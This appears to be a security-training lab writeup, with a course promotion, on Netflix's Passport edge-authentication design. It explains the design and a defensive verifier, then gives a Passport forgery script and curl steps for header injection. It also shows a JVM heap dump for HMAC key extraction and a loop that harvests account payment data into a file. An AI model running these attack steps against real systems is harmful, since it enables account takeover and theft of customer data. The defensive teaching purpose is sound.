Authentication Architecture Security Labs in 2026
We wrote 17 deep-dive labs covering authentication architecture patterns from Netflix, Meta, Cloudflare, Stripe, Slack, Discord, Uber, and AWS.
Before we start, shoutout to a platform we built for YOU!
💎 Your next level in cybersecurity isn’t a dream, it’s a proactive roadmap.
HADESS AI Career Coach turns ambition into expertise:
→ 390+ clear career blueprints from entry-level to leadership
→ 490+ in-demand skill modules + practical labs
→ Intelligent AI (not AI buzz, applied AI, promise!) tools + real-world expert coaches and scenarios
Master the skills that matter. Land the roles that pay. Build the future you want.
🔥 Start engineering your career →
https://career.hadess.io
Each of the 17 labs examines a real production authentication system, maps chained attack paths from basic misconfiguration through full compromise, and gives you the secure configuration with verification.
The labs cover edge authentication (Netflix Passport identity propagation, Netflix MSL protocol for constrained devices), privacy-preserving authentication (Meta Anonymous Credential Service with VOPRFs, Meta Private Data Lookup with PSI, Cloudflare ARC anonymous rate limiting), modern credential formats (Meta Delegated Credentials for TLS, DPoP proof-of-possession RFC 9449, PASETO tokens), platform-specific auth (Stripe API key hierarchy, Slack token types where xoxp bypasses MFA, Discord Ed25519 interaction verification), zero trust architecture (Cloudflare Access + MASQUE, AWS Verified Access with Cedar policy language), workload identity (Uber SPIFFE/SPIRE), and customer-managed encryption (Slack EKM scope-based keys).
Every attack scenario chains from initial access through lateral movement to full compromise.
Lab 01: Netflix Passport Edge Authentication and Identity Propagation
Lab Reference
Lab ID: AUTH-LAB-01
Title: Netflix Passport Edge Authentication and Identity Propagation
Category: Authentication Architecture / Edge Identity
Difficulty: Advanced
OWASP Reference: ASVS V2: Authentication, V3: Session Management
CVE References: CVE-2024-1403 (Progress OpenEdge Authentication Bypass, CVSS 10.0)
Tools: curl, jq, protoc, Burp Suite, mitmproxy, Wireshark
Environment: Netflix Zuul edge gateway, internal microservices with Passport consumption
Writeup
Netflix routes all inbound traffic through a Zuul edge gateway cluster. Every external authentication token (MSL tokens from devices, HTTP cookies from browsers, OAuth tokens from partners) terminates at this gateway. None of these tokens propagate deeper into the service mesh. Instead, the gateway validates the external credential and generates an internal identity object called a Passport.
A Passport is a Protocol Buffers (protobuf) serialized structure containing two main sections: UserInfo and DeviceInfo. UserInfo holds the authenticated user’s identity (account ID, profile ID, authentication level). DeviceInfo holds device metadata (ESN, device type, client version). The entire protobuf payload is signed with HMAC-SHA256 using a symmetric key shared between the edge gateway and a verification library embedded in downstream services.
The architecture works through two main components on the Zuul gateway. The Passport Injection Filter intercepts every inbound request after external authentication succeeds. It strips any pre-existing Passport headers from the request (preventing external injection), resolves the caller’s identity from the validated external token, constructs the Passport protobuf, signs it with HMAC-SHA256, and attaches it as a binary header. Passport Actions handle upstream cookie resolution and token refresh operations that need to interact with the authentication systems on the way back out.
Before Passport existed, each of Netflix’s hundreds of microservices needed to understand and validate every external token format. A service processing a request from a smart TV needed MSL parsing logic. The same service handling a web request needed cookie validation logic. Every service was a potential authentication bypass surface. Passport collapses this sprawl into a single enforcement point at the edge.
The protobuf schema for Passport looks roughly like this:
message Passport {
  message UserInfo {
    string account_id = 1;
    string profile_id = 2;
    AuthLevel auth_level = 3;
    int64 issued_at = 4;
    repeated string entitlements = 5;
  }
  message DeviceInfo {
    string esn = 1;
    string device_type = 2;
    string client_version = 3;
    string ip_address = 4;
  }
  UserInfo user_info = 1;
  DeviceInfo device_info = 2;
  bytes hmac_signature = 3;
  int64 expiration = 4;
}
The HMAC signature covers the serialized UserInfo and DeviceInfo fields. When a downstream service receives a request, it deserializes the Passport, recomputes the HMAC over the identity fields, and compares it to the attached signature. If the signature matches, the service trusts the identity claims without any further authentication checks.
This is the fundamental security tradeoff. Passport eliminates distributed authentication complexity but concentrates all identity trust in the edge gateway and the HMAC key. If an attacker compromises the HMAC key or the Zuul filter chain, they can forge Passports for any user and access any microservice as any identity.
The real-world parallel is CVE-2024-1403, a CVSS 10.0 authentication bypass in Progress OpenEdge. That vulnerability allowed attackers to bypass edge authentication entirely by manipulating the authentication handling logic at the gateway layer. The architectural pattern is identical: a single edge authentication point where a bypass gives access to everything behind it.
Netflix mitigates this through defense in depth that is not obvious from the public blog post but follows from the architecture. The HMAC key rotates on a schedule. Passports carry short expiration times measured in seconds, not minutes. The Zuul gateway runs in a hardened environment with restricted access. But the fundamental tension remains: the edge is a single point of failure for identity.
Passport Lifecycle
The full request lifecycle works as follows. A client sends a request with an external token to the Netflix edge. The Zuul gateway’s authentication filter validates the external token against the appropriate auth system (MSL key server for devices, cookie validation service for web, OAuth provider for partners). On successful validation, the Passport Injection Filter constructs a Passport protobuf, signs it, and replaces the external token with the Passport in the internal request headers. The request routes to the target microservice. The microservice deserializes the Passport, verifies the HMAC, checks the expiration, and extracts the identity claims. No microservice ever sees or handles the original external token.
Single Point of Enforcement
The Zuul gateway cluster typically runs dozens of filter chains in sequence. Authentication is one filter among many (rate limiting, routing, request decoration). A bug in filter ordering, a misconfigured filter chain, or a code deployment that accidentally removes the Passport Injection Filter can silently break the entire identity model. Requests would flow through without a valid Passport, and downstream services would either reject them (safe failure) or fall back to some default identity (catastrophic failure).
Security Considerations
HMAC Key as Crown Jewel: The symmetric HMAC-SHA256 key used for Passport signing is the single most sensitive secret in the architecture. Compromise of this key allows forging Passports for arbitrary users. The key must live in memory on every Zuul gateway instance, making it accessible to anyone with host-level access to the gateway fleet.
No Per-Service Verification Granularity: All services share the same HMAC key for Passport verification. There is no scoping mechanism where a payment service only accepts Passports with payment-level authentication, while a browse service accepts lower-level auth. The Passport is a flat identity assertion trusted uniformly.
Passport Header Injection: If the Zuul filter chain fails to strip pre-existing Passport headers from inbound requests, an external attacker can inject a pre-crafted Passport. The stripping logic must execute before any routing or processing occurs.
Expiration Window: Even with short expiration (seconds), a stolen valid Passport can be replayed within its validity window. The window must be short enough to limit replay but long enough to account for clock skew across the service mesh.
Protobuf Deserialization: Every downstream service deserializes untrusted protobuf data from the Passport header. Bugs in protobuf parsing libraries can lead to crashes or code execution. The protobuf payload should be size-limited and schema-validated.
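The downstream verification path described above (deserialize, recompute the HMAC, check expiration) together with the size-limit, replay-window and deserialization considerations, as an added example that is not Netflix's code or the lab's own: a dependency-free Passport issuer and verifier that writes and reads the outer message in protobuf wire format by hand. It treats the UserInfo and DeviceInfo sections as opaque, already-serialized bytes, binds the expiration into the MAC input (the writeup's MAC over only UserInfo and DeviceInfo would leave the expiry unauthenticated), and authenticates the raw bytes before anything is parsed; the size cap and clock-skew values are assumptions.

```python
import hmac, hashlib
MAX_PASSPORT_BYTES = 4096  # assumed cap; the writeup asks for a size limit without giving a value
CLOCK_SKEW_SECONDS = 5     # assumed tolerance for clock skew across the service mesh

def _varint(n):
    return bytes([n]) if n < 0x80 else bytes([n & 0x7F | 0x80]) + _varint(n >> 7)
def encode_field(num, value):
    # Protobuf wire format: type 0 (varint) for ints, type 2 (length-delimited) for bytes.
    if isinstance(value, int): return _varint(num << 3) + _varint(value)
    return _varint(num << 3 | 2) + _varint(len(value)) + value
def _read_varint(buf, i):
    n = shift = 0
    while True:
        b, i = buf[i], i + 1
        n, shift = n | (b & 0x7F) << shift, shift + 7
        if not b & 0x80: return n, i
def split_outer_fields(blob):
    # Split the outer Passport message into {field number: raw value}; inner sections stay unparsed.
    fields, i = {}, 0
    while i < len(blob):
        tag, i = _read_varint(blob, i)
        if tag & 7 == 0:
            fields[tag >> 3], i = _read_varint(blob, i)
        elif tag & 7 == 2:
            ln, i = _read_varint(blob, i)
            fields[tag >> 3], i = blob[i:i + ln], i + ln
        else: raise ValueError("unsupported wire type")
    return fields
def _signed_bytes(user_bytes, device_bytes, exp):
    # MAC input: the length-delimited sections plus the expiry, so neither can be re-spliced or extended.
    return encode_field(1, user_bytes) + encode_field(2, device_bytes) + encode_field(4, exp)

def issue_passport(key, user_bytes, device_bytes, ttl_seconds, now):
    # Edge side: sign the serialized UserInfo/DeviceInfo and wrap them in the outer message.
    exp = now + ttl_seconds
    sig = hmac.new(key, _signed_bytes(user_bytes, device_bytes, exp), hashlib.sha256).digest()
    return encode_field(1, user_bytes) + encode_field(2, device_bytes) + encode_field(3, sig) + encode_field(4, exp)

def verify_passport(key, blob, now):
    # Downstream side: size-limit, authenticate, check expiry; only then hand inner bytes to the protobuf parser.
    if len(blob) > MAX_PASSPORT_BYTES: return None
    try:
        f = split_outer_fields(blob)
        user_bytes, device_bytes, sig, exp = f[1], f[2], f[3], f[4]
        expected = hmac.new(key, _signed_bytes(user_bytes, device_bytes, exp), hashlib.sha256).digest()
        if not hmac.compare_digest(sig, expected) or now > exp + CLOCK_SKEW_SECONDS: return None
    except (KeyError, IndexError, ValueError, TypeError):  # malformed or mistyped fields never pass
        return None
    return user_bytes, device_bytes
```

An unsigned header of the kind Scenario 1 below probes for fails at the missing signature field, and a captured Passport whose expiry has been edited fails the constant-time comparison.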
Threat Model
+-----------------------+
|   External Clients    |
| (MSL, Cookies, OAuth) |
+-----------+-----------+
            |
  External tokens terminated here
            |
+-----------v-----------+
|   Zuul Edge Gateway   |
|  - Auth Filter        |
|  - Passport Injection |
|  - HMAC Signing       |
+-----------+-----------+
            |
  Passport (protobuf + HMAC)
            |
         +--+-----------------+--------------------+
         |                    |                    |
+--------v---------+ +--------v---------+ +--------v---------+
|    Service A     | |    Service B     | |    Service C     |
|   (Streaming)    | |    (Billing)     | |(Recommendations) |
|     Passport     | |     Passport     | |     Passport     |
|   Verify + Use   | |   Verify + Use   | |   Verify + Use   |
+------------------+ +------------------+ +------------------+
Threat 1: HMAC key compromise -> forge Passport for any user
Threat 2: Zuul filter bypass -> requests without valid Passport reach services
Threat 3: Passport header injection -> external attacker supplies crafted Passport
Threat 4: Passport replay within expiration window
Threat 5: Protobuf deserialization bugs in downstream services
Threat 6: Zuul gateway compromise -> full identity system takeover
Vulnerable Configuration
# Zuul gateway configuration - VULNERABLE defaults
zuul:
  filters:
    passport-injection:
      enabled: true
      # VULNERABLE: not stripping pre-existing Passport headers
      strip-existing-passport: false
    authentication:
      enabled: true
  passport:
    hmac:
      # VULNERABLE: static key, no rotation
      key: "c2VjcmV0LWhtYWMta2V5LW5ldmVyLXJvdGF0ZWQ="
      algorithm: HmacSHA256
    expiration:
      # VULNERABLE: 5-minute expiration is too long
      seconds: 300
    verification:
      # VULNERABLE: downstream services skip verification
      required: false
# Forging a Passport when HMAC key is known
import hmac
import hashlib
import time
from passport_pb2 import Passport  # compiled protobuf

def forge_passport(hmac_key, target_account_id, target_profile_id):
    passport = Passport()
    passport.user_info.account_id = target_account_id
    passport.user_info.profile_id = target_profile_id
    passport.user_info.auth_level = 3  # highest auth level
    passport.user_info.issued_at = int(time.time())
    passport.device_info.esn = "NFANDROID2-PRV-FORGE"
    passport.device_info.device_type = "android"
    passport.device_info.client_version = "8.94.0"
    passport.expiration = int(time.time()) + 300
    # Sign with stolen HMAC key
    payload = passport.user_info.SerializeToString() + \
        passport.device_info.SerializeToString()
    signature = hmac.new(
        hmac_key.encode(),
        payload,
        hashlib.sha256
    ).digest()
    passport.hmac_signature = signature
    return passport.SerializeToString()
Attack Scenarios
Scenario 1: Passport Header Injection via Missing Strip Logic
An attacker discovers that the Zuul gateway does not strip pre-existing Passport headers from inbound requests. They craft a valid-looking Passport protobuf and send it directly, bypassing external authentication entirely.
# Step 1: Identify that the edge gateway is Zuul-based
curl -v https://api.target.com/health 2>&1 | grep -i "server\|x-zuul"

# Step 2: Probe whether Passport headers survive from external requests
# Craft a minimal Passport protobuf (base64-encoded)
FAKE_PASSPORT=$(python3 -c "
import base64
from passport_pb2 import Passport
p = Passport()
p.user_info.account_id = '999999999'
p.user_info.auth_level = 3
print(base64.b64encode(p.SerializeToString()).decode())
")

# Step 3: Send request with injected Passport header
curl -H "X-Netflix-Passport: $FAKE_PASSPORT" \
     https://api.target.com/api/user/profile

# Step 4: If the service responds with account 999999999's profile data,
# the Passport was not stripped and not verified (unsigned but accepted)
Scenario 2: HMAC Key Extraction and Full Identity Forgery
An attacker chains multiple steps: initial access to a Zuul gateway host, HMAC key extraction from memory, and Passport forgery for lateral movement.
# Step 1: Gain initial access to Zuul gateway via SSRF or dependency exploit
# (e.g., Log4Shell in a Zuul filter dependency)

# Step 2: Extract HMAC key from JVM heap
# Zuul runs as a Java process; the HMAC key is in memory
jmap -dump:live,format=b,file=/tmp/zuul_heap.hprof $(pgrep -f zuul)

# Step 3: Search heap dump for HMAC key material
strings /tmp/zuul_heap.hprof | grep -A2 "HmacSHA256"
# Or use Eclipse MAT to find the PassportSigner object

# Step 4: With the HMAC key, forge Passports for any user
python3 forge_passport.py \
    --hmac-key "extracted-key-here" \
    --account-id "100000001" \
    --auth-level 3 \
    --output passport.bin

# Step 5: Use forged Passport to access internal services directly
# (attacker is now inside the network from Step 1)
curl -H "X-Netflix-Passport: $(base64 passport.bin)" \
     http://billing-service.internal:8080/api/account/100000001/subscription

# Step 6: Enumerate high-value accounts
for ACCT in $(seq 100000001 100000100); do
    curl -s -H "X-Netflix-Passport: $(python3 forge_passport.py \
        --hmac-key "$KEY" --account-id "$ACCT" --raw)" \
        http://billing-service.internal:8080/api/account/$ACCT/payment-methods \
        >> exfil_data.json
done